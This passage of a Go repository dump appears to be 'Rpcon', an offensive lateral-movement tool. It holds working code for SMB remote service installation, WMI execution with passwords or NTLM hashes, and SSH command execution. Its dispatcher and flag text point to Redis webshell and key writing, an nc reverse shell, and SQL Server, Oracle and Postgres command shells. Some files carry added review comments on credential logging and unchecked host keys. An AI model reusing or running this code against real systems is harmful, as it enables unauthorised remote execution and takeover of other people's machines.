| case "wmi": 33 | common.Port = 135 34 | WmiExec() 35 | } 36 | } 37 | if 
common.Redis != "" { 38 | switch common.Redis { 39 | case "rk": 40 | common.Port = 6379 41 | Wkey() 42 | case "rs": 43 | common.Port = 6379 44 | Wshell() 45 | case "rn": 46 | common.Port = 6379 47 | ncshell() 48 | case "mysl": 49 | common.Port = 3306 50 | Mysqlshell() 51 | case "mycg": 52 | common.Port = 3306 53 | Myconfig() 54 | case "mssg": 55 | common.Port = 1433 56 | Msscfg() 57 | case "cmshell": 58 | common.Port = 1433 59 | Cmdshell() 60 | case "oleshell": 61 | common.Port = 1433 62 | Oleshell() 63 | case "org": 64 | common.Port = 1521 65 | ORcfg() 66 | case "ors": 67 | common.Port = 1521 68 | ORacleshell() 69 | case "pocfg": 70 | common.Port = 5432 71 | Pocfg() 72 | case "poshell": 73 | common.Port = 5432 74 | Powriteshell() 75 | case "pocode": 76 | common.Port = 5432 77 | Pocode() 78 | } 79 | } else { 80 | con() 81 | } 82 | } 83 | -------------------------------------------------------------------------------- /cmd/smb.go: -------------------------------------------------------------------------------- 1 | package cmdpackage 2 | 3 | import ( 4 | "Rpcon/common" 5 | "fmt" 6 | common2 "github.com/Amzza0x00/go-impacket/pkg/common" 7 | DCERPCv5 "github.com/Amzza0x00/go-impacket/pkg/dcerpc/v5" 8 | "github.com/Amzza0x00/go-impacket/pkg/smb/smb2" 9 | "github.com/Amzza0x00/go-impacket/pkg/util" 10 | "os" 11 | ) 12 | 13 | // 1.查找可用共享目录 14 | // 2.上传文件 15 | // 3.打开远程服务 16 | // 4.创建服务并启动 17 | 18 | var service string 19 | 20 | func init() { 21 | 22 | } 23 | 24 | func Smb() { 25 | debug := false 26 | option := common.ClientOption{ 27 | Host: common.Host, 28 | Port: 445, 29 | Domain: common.Domain, 30 | User: common.User, 31 | Password: common.Password, 32 | Hash: common.Hash, 33 | } 34 | session, err := smb2.NewSession(common2.ClientOptions(option), debug) 35 | if err != nil { 36 | os.Exit(0) 37 | } 38 | defer session.Close() 39 | if session.IsAuthenticated { 40 | } 41 | var serviceName string 42 | if service == "" { 43 | serviceName = string(util.Random(4)) 44 | } else { 
45 | serviceName = service 46 | } 47 | rpc, _ := DCERPCv5.SMBTransport() 48 | rpc.Client = *session 49 | // 创建服务并启动 50 | servicename, _, _ := rpc.ServiceInstall(serviceName, common.File, common.Path) 51 | fmt.Printf("[+] Service name is [%s]\n", servicename) 52 | } 53 |
--------------------------------------------------------------------------------
/cmd/ssh.go:
--------------------------------------------------------------------------------
package cmdpackage

import (
	"Rpcon/common"
	"fmt"
	"golang.org/x/crypto/ssh"
	"log"
	"time"
)

// Sshcmd opens a password-authenticated SSH connection to
// common.Host:common.Port, runs common.Code in a single session and prints
// the combined stdout/stderr of that command.
//
// Every failure ends the process through log.Fatal. log.Fatal exits via
// os.Exit, so the deferred Close calls below do not run on those paths.
func Sshcmd() {
	target := fmt.Sprintf("%s:%d", common.Host, common.Port)

	clientCfg := &ssh.ClientConfig{
		User: common.User,
		Auth: []ssh.AuthMethod{ssh.Password(common.Password)},
		// Upper bound for establishing the TCP connection.
		Timeout: time.Second,
		// NOTE(review): InsecureIgnoreHostKey accepts whatever host key the
		// peer presents, so the server is never authenticated and the
		// password above is sent to any endpoint that answers on this
		// address. The original author already marked this as "not secure
		// enough"; a pinned key or known_hosts-based callback is what
		// detects an on-path endpoint.
		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
	}

	client, dialErr := ssh.Dial("tcp", target, clientCfg)
	if dialErr != nil {
		log.Fatal("创建ssh client 失败", dialErr)
	}
	defer client.Close()

	// One session carries exactly one command.
	sess, sessErr := client.NewSession()
	if sessErr != nil {
		log.Fatal("创建ssh session 失败", sessErr)
	}
	defer sess.Close()

	// Output captured before a failing exit status is not printed: the
	// error branch exits first.
	output, runErr := sess.CombinedOutput(common.Code)
	if runErr != nil {
		log.Fatal("远程执行cmd 失败", runErr)
	}
	fmt.Println(string(output))
}

49 | //func publicKeyAuthFunc(kPath string) ssh.AuthMethod { 50 | // 51 | // keyPath, err := homedir.Expand(kPath) 52 | // if err != nil { 53 | // log.Fatal("find key's home dir failed", err) 54 | // } 55 | // key, err := ioutil.ReadFile(keyPath) 56 | // if err != nil { 57 | // log.Fatal("ssh key file read failed", err) 58 | // } 59 | // // Create the Signer for this private key. 
60 | // signer, err := ssh.ParsePrivateKey(key) 61 | // if err != nil { 62 | // log.Fatal("ssh key signer failed", err) 63 | // } 64 | // return ssh.PublicKeys(signer) 65 | //} 66 | 67 | //cmds := strings.Split(common.Code, ";") 68 | //for _, cmd := range cmds { 69 | //cmd = strings.TrimSpace(cmd) 70 | //if len(cmd) == 0 { 71 | //continue 72 | //} 73 |
--------------------------------------------------------------------------------
/cmd/wmiex.go:
--------------------------------------------------------------------------------
package cmdpackage

import (
	"Rpcon/common"
	"Rpcon/pkg"
	"fmt"
	"strings"
	"time"
)

var flag = false

// WmiExec calls pkg.Wmiexec, reports the outcome through the pkg log helpers
// and returns the error pkg.Wmiexec produced.
//
// The error line is built and passed to pkg.LogError before the result is
// inspected, so LogError runs on success as well as on failure.
//
// NOTE(review): both log lines carry credentials in clear text. The error line
// always includes common.Password, and the success line appends the hash or
// the password. Anything that collects this tool's output ends up holding
// those secrets.
func WmiExec() (tmperr error) {
	started := time.Now().Unix()
	ok, err := pkg.Wmiexec()

	// Port 445 is hard-coded in the error line, whereas the success line
	// prints common.Port.
	errlog := fmt.Sprintf("[-] WmiExec %v:%v %v %v %v", common.Host, 445, common.User, common.Password, err)
	errlog = strings.ReplaceAll(errlog, "\n", "")
	pkg.LogError(errlog)

	if ok {
		var result string
		if common.Domain == "" {
			result = fmt.Sprintf("[+] WmiExec:%v:%v:%v ", common.Host, common.Port, common.User)
		} else {
			result = fmt.Sprintf("[+] WmiExec:%v:%v:%v\\%v ", common.Host, common.Port, common.Domain, common.User)
		}
		if common.Hash == "" {
			result += common.Password
		} else {
			result += "hash: " + common.Hash
		}
		pkg.LogSuccess(result)
		return err
	}

	// Failure path: every branch below hands back the same error value.
	tmperr = err
	if pkg.CheckErrs(err) {
		return err
	}
	budget := int64(len(common.User)*len(common.Password)) * common.Timeout
	if time.Now().Unix()-started > budget {
		return err
	}
	if len(common.Hash) == 32 {
		return
	}
	return tmperr
}
-------------------------------------------------------------------------------- /common/config.go: -------------------------------------------------------------------------------- 1 | package common 2 | 3 | var ( 4 | Host string 5 | User string 6 | Password string 7 
| Port int 8 | Method string 9 | Code string 10 | DBname string 11 | File string 12 | Help bool 13 | Hash string 14 | Domain string 15 | Timeout int64 = 3 16 | ) 17 | 18 | var ( 19 | Redis string 20 | wkey string 21 | Wshell string 22 | wcode string 23 | Path string 24 | Wport string 25 | ) 26 | 27 | type ClientOption struct { 28 | Host string 29 | Port int 30 | Workstation string 31 | Domain string 32 | User string 33 | Password string 34 | Hash string 35 | } 36 |
--------------------------------------------------------------------------------
/common/flag.go:
--------------------------------------------------------------------------------
package common

import "flag"

// Flag registers the command-line options on the default flag set, binds them
// to the package-level variables of this package and parses os.Args.
//
// "-h" is registered as the host option, so it does not print help. The
// password (-pw) and hash (-hash) are taken as plain arguments, which makes
// them visible in shell history and process listings on the machine running
// the tool.
func Flag() {
	stringFlags := []struct {
		dst              *string
		name, def, usage string
	}{
		{&Host, "h", "", "host | -h 192.168.1.1"},
		{&User, "u", "", "user | root"},
		{&Password, "pw", "", "password | rpcon -h 192.168.1.1 -p 22 -u root -pw root"},
		{&Code, "c", "", "code | rpcon -h 192.168.1.1 -p 22 -u root -pw root -c whoami\nfor redis\n -c wk write key\n -c wshell write webshell\n -c shell -ws 192.168.1.1 -wp 666"},
		{&Domain, "domain", "", ""},
		{&Hash, "hash", "", ""},
		{&Method, "m", "", "method | rpcon -h 192.168.1.1:22 -u root -p root -m ssh -c id"},
		{&Redis, "r", "", "sql shell | -r rk | -r rs"},
		{&Path, "pt", "/var/www/html/", "path"},
		{&Wshell, "ws", "", "ws 反弹shell的ip"},
		{&Wport, "wp", "", "wp 反弹shell的端口"},
		{&File, "f", "", "filename"},
		{&DBname, "d", "", "数据库名称"},
	}
	for _, f := range stringFlags {
		flag.StringVar(f.dst, f.name, f.def, f.usage)
	}
	// The port is the only integer option and defaults to 22.
	flag.IntVar(&Port, "p", 22, "port | ssh -p 22")
	flag.Parse()
}
--------------------------------------------------------------------------------
/common/parse.go:
--------------------------------------------------------------------------------
package common

import (
	"flag"
	"os"
)

// Parse prints the usage text and exits with status 0 when neither a host nor
// a password was supplied. The original also tested Method in a first
// condition, but that case is already covered by the host-and-password check,
// so a single test gives the same result.
func Parse() {
	if Host != "" || Password != "" {
		return
	}
	flag.Usage()
	os.Exit(0)
}
-------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module Rpcon 2 | 3 | go 1.18 4 | 5 | require ( 6 | github.com/Amzza0x00/go-impacket v0.2.2 7 | github.com/C-Sto/goWMIExec v0.0.1-deva.0.20210704154847-b8ebd6464a06 8 | github.com/denisenkom/go-mssqldb v0.12.3 9 | github.com/go-sql-driver/mysql v1.7.0 10 | github.com/lib/pq v1.10.7 11 | github.com/sijms/go-ora/v2 v2.7.3 12 | golang.org/x/crypto v0.7.0 13 | ) 14 | 15 | require ( 16 | github.com/go-redis/redis/v8 v8.11.5 17 | golang.org/x/sys v0.6.0 // indirect 18 | ) 19 | 20 | require ( 21 | github.com/cespare/xxhash/v2 v2.1.2 // indirect 22 | github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f // indirect 23 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe // indirect 24 | github.com/golang-sql/sqlexp v0.1.0 // indirect 25 | go.uber.org/atomic v1.7.0 // indirect 26 | go.uber.org/multierr v1.6.0 // indirect 27 | go.uber.org/zap v1.24.0 // indirect 28 | golang.org/x/text v0.8.0 // indirect 29 | ) 30 | 31 | replace github.com/C-Sto/goWMIExec v0.0.1-deva.0.20210704154847-b8ebd6464a06 => github.com/shadow1ng/goWMIExec v0.0.2 32 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/Amzza0x00/go-impacket v0.2.2 h1:+LPh394IB86m0qbGTk/HPVVcOK0g1lDTXRp8QH2FYJ4= 2 | github.com/Amzza0x00/go-impacket v0.2.2/go.mod h1:xi87fs60ycI8HNSRgu19kku+RMdgVevzEk6KG8fPIq4= 3 | github.com/Azure/azure-sdk-for-go/sdk/azcore v0.19.0/go.mod h1:h6H6c8enJmmocHUbLiiGY6sx7f9i+X3m1CHdd5c6Rdw= 4 | github.com/Azure/azure-sdk-for-go/sdk/azidentity v0.11.0/go.mod 
h1:HcM1YX14R7CJcghJGOYCgdezslRSVzqwLf/q+4Y2r/0= 5 | github.com/Azure/azure-sdk-for-go/sdk/internal v0.7.0/go.mod h1:yqy467j36fJxcRV2TzfVZ1pCb5vxm4BtZPUdYWe/Xo8= 6 | github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= 7 | github.com/benbjohnson/clock v1.1.0 h1:Q92kusRqC1XV2MjkWETPvjJVqKetz1OzxZB7mHJLju8= 8 | github.com/cespare/xxhash/v2 v2.1.2 h1:YRXhKfTDauu4ajMg1TPgFO5jnlC2HCbmLXMcTG5cbYE= 9 | github.com/cespare/xxhash/v2 v2.1.2/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= 10 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 11 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 12 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 13 | github.com/denisenkom/go-mssqldb v0.12.3 h1:pBSGx9Tq67pBOTLmxNuirNTeB8Vjmf886Kx+8Y+8shw= 14 | github.com/denisenkom/go-mssqldb v0.12.3/go.mod h1:k0mtMFOnU+AihqFxPMiF05rtiDrorD1Vrm1KEz5hxDo= 15 | github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f h1:lO4WD4F/rVNCu3HqELle0jiPLLBs70cWOduZpkS1E78= 16 | github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f/go.mod h1:cuUVRXasLTGF7a8hSLbxyZXjz+1KgoB3wDUb6vlszIc= 17 | github.com/dnaeon/go-vcr v1.2.0/go.mod h1:R4UdLID7HZT3taECzJs4YgbbH6PIGXB6W/sc5OLb6RQ= 18 | github.com/fsnotify/fsnotify v1.4.9 h1:hsms1Qyu0jgnwNXIxa+/V/PDsU6CfLf6CNO8H7IWoS4= 19 | github.com/go-redis/redis/v8 v8.11.5 h1:AcZZR7igkdvfVmQTPnu9WE37LRrO/YrBH5zWyjDC0oI= 20 | github.com/go-redis/redis/v8 v8.11.5/go.mod h1:gREzHqY1hg6oD9ngVRbLStwAWKhA0FEgq8Jd4h5lpwo= 21 | github.com/go-sql-driver/mysql v1.7.0 h1:ueSltNNllEqE3qcWBTD0iQd3IpL/6U+mJxLkazJ7YPc= 22 | github.com/go-sql-driver/mysql v1.7.0/go.mod h1:OXbVy3sEdcQ2Doequ6Z5BW6fXNQTmx+9S1MCJN5yJMI= 23 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY= 24 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod 
h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0= 25 | github.com/golang-sql/sqlexp v0.1.0 h1:ZCD6MBpcuOVfGVqsEmY5/4FtYiKz6tSyUv9LPEDei6A= 26 | github.com/golang-sql/sqlexp v0.1.0/go.mod h1:J4ad9Vo8ZCWQ2GMrC4UCQy1JpCbwU9m3EOqtpKwwwHI= 27 | github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= 28 | github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= 29 | github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= 30 | github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= 31 | github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= 32 | github.com/lib/pq v1.10.7 h1:p7ZhMD+KsSRozJr34udlUrhboJwWAgCg34+/ZZNvZZw= 33 | github.com/lib/pq v1.10.7/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= 34 | github.com/modocache/gover v0.0.0-20171022184752-b58185e213c5/go.mod h1:caMODM3PzxT8aQXRPkAt8xlV/e7d7w8GM5g0fa5F0D8= 35 | github.com/nxadm/tail v1.4.8 h1:nPr65rt6Y5JFSKQO7qToXr7pePgD6Gwiw05lkbyAQTE= 36 | github.com/onsi/ginkgo v1.16.5 h1:8xi0RTUf59SOSfEtZMvwTvXYMzG4gV23XVHOZiXNtnE= 37 | github.com/onsi/gomega v1.18.1 h1:M1GfJqGRrBrrGGsbxzV5dqM2U2ApXefZCQpkukxYRLE= 38 | github.com/pkg/browser v0.0.0-20180916011732-0a3d74bf9ce4/go.mod h1:4OwLy04Bl9Ef3GJJCoec+30X3LQs/0/m4HFRt/2LUSA= 39 | github.com/pkg/errors v0.8.1 h1:iURUrRGxPUNPdy5/HRSm+Yj6okJ6UtLINN0Q9M4+h3I= 40 | github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= 41 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 42 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 43 | github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4= 44 | github.com/shadow1ng/goWMIExec v0.0.2 h1:tZdno/F0JVwwpX34fidRqnT7lvobUgelyb/wWd7YgcM= 45 | github.com/shadow1ng/goWMIExec v0.0.2/go.mod h1:SWfWb5+XTfacyp4OULdNsxOdsQTjFEpAUEn5JGTCMIA= 46 | 
github.com/sijms/go-ora/v2 v2.7.3 h1:ppqaCq/qfc/xqr9ZCVOm7IHbzSkvArg/Bz9P1RgBwno= 47 | github.com/sijms/go-ora/v2 v2.7.3/go.mod h1:EHxlY6x7y9HAsdfumurRfTd+v8NrEOTR3Xl4FWlH6xk= 48 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 49 | github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= 50 | github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4= 51 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 52 | github.com/stretchr/testify v1.8.0 h1:pSgiaMZlXftHpm5L7V1+rVB+AZJydKsMxsQBIJw4PKk= 53 | go.uber.org/atomic v1.5.0/go.mod h1:sABNBOSYdrvTF6hTgEIbc7YasKWGhgEQZyfxyTvoXHQ= 54 | go.uber.org/atomic v1.7.0 h1:ADUqmZGgLDDfbSL9ZmPxKTybcoEYHgpYfELNoN+7hsw= 55 | go.uber.org/atomic v1.7.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc= 56 | go.uber.org/goleak v1.1.11 h1:wy28qYRKZgnJTxGxvye5/wgWr1EKjmUDGYox5mGlRlI= 57 | go.uber.org/multierr v1.3.0/go.mod h1:VgVr7evmIr6uPjLBxg28wmKNXyqE9akIJ5XnfpiKl+4= 58 | go.uber.org/multierr v1.6.0 h1:y6IPFStTAIT5Ytl7/XYmHvzXQ7S3g/IeZW9hyZ5thw4= 59 | go.uber.org/multierr v1.6.0/go.mod h1:cdWPpRnG4AhwMwsgIHip0KRBQjJy5kYEpYjJxpXp9iU= 60 | go.uber.org/tools v0.0.0-20190618225709-2cfd321de3ee/go.mod h1:vJERXedbb3MVM5f9Ejo0C68/HhF8uaILCdgjnY+goOA= 61 | go.uber.org/zap v1.14.0/go.mod h1:zwrFLgMcdUuIBviXEYEH1YKNaOBnKXsx2IPda5bBwHM= 62 | go.uber.org/zap v1.24.0 h1:FiJd5l1UOLj0wCgbSE0rwwXHzEdAZS6hiiSnxJN/D60= 63 | go.uber.org/zap v1.24.0/go.mod h1:2kMP+WWQ8aoFoedH3T2sq6iJ2yDWpHbP0f6MQbS9Gkg= 64 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 65 | golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= 66 | golang.org/x/crypto v0.0.0-20200221231518-2aa609cf4a9d/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= 67 | golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897/go.mod 
h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= 68 | golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= 69 | golang.org/x/crypto v0.7.0 h1:AvwMYaRytfdeVt3u6mLaxYtErKYjxA2OXjJ1HHq6t3A= 70 | golang.org/x/crypto v0.7.0/go.mod h1:pYwdfH91IfpZVANVyUOhSIPZaFoJGxTFbZhFTx+dXZU= 71 | golang.org/x/lint v0.0.0-20190930215403-16217165b5de/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= 72 | golang.org/x/mod v0.0.0-20190513183733-4bf6d317e70e/go.mod h1:mXi4GBBbnImb6dmsKGUJ2LatrhH/nqhxcFungHvyanc= 73 | golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 74 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 75 | golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= 76 | golang.org/x/net v0.0.0-20210610132358-84b48f89b13b/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= 77 | golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= 78 | golang.org/x/net v0.8.0 h1:Zrh2ngAOFYneWTAIAPethzeaQLuHwhuBkuV6ZiRnUaQ= 79 | golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 80 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 81 | golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 82 | golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 83 | golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 84 | golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 85 | golang.org/x/sys v0.6.0 h1:MVltZSvRTcU2ljQOhs94SXPftV6DCNnZViHeQps87pQ= 86 | golang.org/x/sys v0.6.0/go.mod 
h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 87 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= 88 | golang.org/x/term v0.6.0 h1:clScbb1cHjoCkyRbWwBEUZ5H/tIFu5TAXIqaZD0Gcjw= 89 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 90 | golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= 91 | golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= 92 | golang.org/x/text v0.8.0 h1:57P1ETyNKtuIjB4SRd15iJxuhj8Gc416Y78H3qgMh68= 93 | golang.org/x/text v0.8.0/go.mod h1:e1OnstbJyHTd6l/uOt8jFFHp6TRDWZR/bV3emEE/zU8= 94 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 95 | golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= 96 | golang.org/x/tools v0.0.0-20190621195816-6e04913cbbac/go.mod h1:/rFqwRUd4F7ZHNgwSSTFct+R/Kf4OFW1sUzUTQQTgfc= 97 | golang.org/x/tools v0.0.0-20191029041327-9cc4af7d6b2c/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= 98 | golang.org/x/tools v0.0.0-20191029190741-b9c20aec41a5/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= 99 | golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 100 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 101 | gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 102 | gopkg.in/errgo.v2 v2.1.0/go.mod h1:hNsd1EY+bozCKY1Ytp96fpM3vjJbqLJn88ws8XvfDNI= 103 | gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7 h1:uRGJdciOHaEIrze2W8Q3AKkepLTh2hOroT7a+7czfdQ= 104 | gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= 105 | gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= 106 | gopkg.in/yaml.v2 v2.4.0 
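h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= 107 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= 108 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 109 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 110 | gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= 111 | honnef.co/go/tools v0.0.1-2019.2.3/go.mod h1:a3bituU0lyd329TUQxRnasdCoJDkEUEAqEt0JzvZhAg= 112 |
--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
package main

import (
	cmdpackage "Rpcon/cmd"
	"Rpcon/common"
)

// main parses the command-line flags and hands control to cmdpackage.Parse.
func main() {
	common.Flag()
	cmdpackage.Parse()
}
--------------------------------------------------------------------------------
/pkg/PrintRow.go:
--------------------------------------------------------------------------------
package pkg

import (
	"fmt"
	"time"
)

// PrintRow writes one result row to stdout: every column is followed by a tab
// and the row is ended with a newline.
//
// Each element is expected to be a *interface{}, which the code dereferences.
// Elements of any other type are printed as they are, and a nil pointer is
// shown as NULL, instead of panicking on the type assertion.
func PrintRow(colsdata []interface{}) {
	for _, val := range colsdata {
		cell := val
		if ptr, ok := val.(*interface{}); ok {
			if ptr == nil {
				cell = nil
			} else {
				cell = *ptr
			}
		}
		switch v := cell.(type) {
		case nil:
			fmt.Print("NULL")
		case bool:
			if v {
				fmt.Print("True")
			} else {
				fmt.Print("False")
			}
		case []byte:
			fmt.Print(string(v))
		case time.Time:
			// Go layouts are written with the reference time
			// 2006-01-02 15:04:05; the previous layout string was an
			// ordinary date, which Format does not read as a pattern.
			fmt.Print(v.Format("2006-01-02 15:04:05.999"))
		default:
			fmt.Print(v)
		}
		fmt.Print("\t")
	}
	fmt.Println()
}
--------------------------------------------------------------------------------
/pkg/log.go:
--------------------------------------------------------------------------------
package pkg

import (
	"fmt"
	"os"
	"strings"
	"sync"
	"time"
)

// Shared logging state. Only the uses visible in this file are described.
var (
	Num        int64                  // printed as the total in LogError's "End/Num" prefix
	End        int64                  // printed as the progress count in the same prefix
	Results    = make(chan *string)   // unbuffered channel that LogSuccess sends to
	Start      = true
	LogSucTime int64                  // Unix time of the last LogSuccess call
	LogErrTime int64                  // Unix time of the last error LogError printed
	WaitTime   int64                  // throttle window in seconds; 0 means LogError always prints
	Silent     bool
	LogWG      sync.WaitGroup         // incremented once per LogSuccess call
)

// LogSuccess records the time, adds one to LogWG and sends the result on
// Results.
//
// NOTE(review): Results is unbuffered and no receiver is visible in this file,
// so the send blocks until something reads it; confirm a consumer exists.
func LogSuccess(result string) {
	LogWG.Add(1)
	LogSucTime = time.Now().Unix()
	Results <- &result
}

// LogError prints errinfo with an "End/Num" prefix and then ends the process
// with exit status 0. It prints when WaitTime is 0, or when more than WaitTime
// seconds have passed since both the last success and the last printed error.
// Otherwise it returns without printing.
//
// Because the exit status is 0, a caller or wrapper script cannot tell a
// failure from a success by the exit code.
func LogError(errinfo interface{}) {
	if WaitTime == 0 {
		fmt.Printf(" %v/%v %v \n", End, Num, errinfo)
		os.Exit(0)
	} else if (time.Now().Unix()-LogSucTime) > WaitTime && (time.Now().Unix()-LogErrTime) > WaitTime {
		fmt.Printf(" %v/%v %v \n", End, Num, errinfo)
		LogErrTime = time.Now().Unix()
		os.Exit(0)
	}
}

// CheckErrs reports whether err's message contains, ignoring case, one of the
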